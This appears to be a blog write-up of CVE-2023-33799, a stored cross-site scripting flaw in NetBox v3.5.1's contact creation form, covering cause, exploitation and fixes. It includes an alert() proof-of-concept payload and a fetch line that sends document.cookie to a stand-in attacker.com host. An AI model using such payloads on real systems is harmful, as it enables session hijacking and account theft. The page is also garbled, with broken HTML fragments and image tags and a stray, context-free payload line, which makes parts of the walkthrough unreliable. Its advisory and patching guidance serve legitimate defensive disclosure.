CVE-2023-33799 - Deep Dive Into NetBox v3.5.1 Stored XSS in Create Contacts

NetBox is a popular open-source tool for managing IP address spaces and data center resources. But even mature projects can have security holes. In this long read, we explore CVE-2023-33799 — a stored cross-site scripting (XSS) bug in NetBox v3.5.1’s Create Contacts function. We'll break down what went wrong, show you how to exploit it, provide sample payloads, and share links to original references.

What is CVE-2023-33799?

CVE-2023-33799 is a security vulnerability in NetBox version 3.5.1. Specifically, it’s a stored XSS in the /tenancy/contacts/ route when creating Contacts. Attackers can inject JavaScript or HTML by putting a malicious payload in the Name field. Since this data is stored, any user viewing the Contacts list or details could be affected.

Type: Stored Cross-Site Scripting (XSS)

- Component: Create Contacts (/tenancy/contacts/)
- CVE ID: CVE-2023-33799

Why is Stored XSS So Dangerous?

Unlike reflected XSS (which requires a victim to click a specific link), stored XSS persists on the server. Anyone who views the malicious entry gets hit, making this bug especially problematic on shared portals like NetBox.

Root Cause: Lack of Input Sanitization

The vulnerability exists because NetBox fails to sanitize or escape user input in the Name field before it gets displayed. JavaScript you insert is rendered and executed in others’ browsers.

Exploiting CVE-2023-33799 (With Code Snippet)

Let’s walk through how someone could exploit this in a standard NetBox v3.5.1 install.

A classic payload for demonstration is

<script>alert("NetBox XSS!");</script>

`html

alert("NetBox XSS!");

Fill out other required fields as needed, then submit.

https://i.imgur.com/yUSZPH.png" alt="NetBox Add Contact screenshot" width="600"/>

Whenever someone views the Contacts page (list or detail), the stored script runs in their browser

https://i.imgur.com/pAMU9Do.png" alt="XSS alert box on NetBox page" width="400"/>

</h2><p>    fetch('<a href="https://attacker.com/steal?cookie='+document.cookie" rel="nofollow">https://attacker.com/steal?cookie='+document.cookie</a>)<br>

NetBox quickly fixed this flaw in later versions. Here’s how you can stay protected

- Update NetBox: Always upgrade to the latest version. This bug is patched in versions after 3.5.1.
   - NetBox GitHub Releases
- Input Sanitization: If you must run an older version, restrict who can modify Contacts and consider adding a web application firewall (WAF).

Technical References

- NVD: CVE-2023-33799
- Exploit DB: 51493
- NetBox Issue Tracker
- Official advisory

To fix and prevent XSS, output user input with escaping libraries, not directly

from django.utils.html import escape

# Example in a Django template:
{{ contact.name|escape }}

And always validate/sanitize user input at every layer.

Final Thoughts

XSS bugs like CVE-2023-33799 are easy to overlook — and even easier for attackers to abuse. Always sanitize user input and keep your software up to date. If you use NetBox, make sure you’re not running v3.5.1 anymore, and review any logs for suspicious “Contact” names just in case!

Stay safe and patch those systems!

*If you found this post helpful, consider sharing it to help others avoid falling for XSS in their critical tools like NetBox!*

References

- https://nvd.nist.gov/vuln/detail/CVE-2023-33799
- https://github.com/netbox-community/netbox/security/advisories/GHSA-k33w-9692-399p
- https://www.exploit-db.com/exploits/51493

Timeline

Published on: 05/24/2023 20:15:00 UTC
Last modified on: 05/27/2023 03:41:00 UTC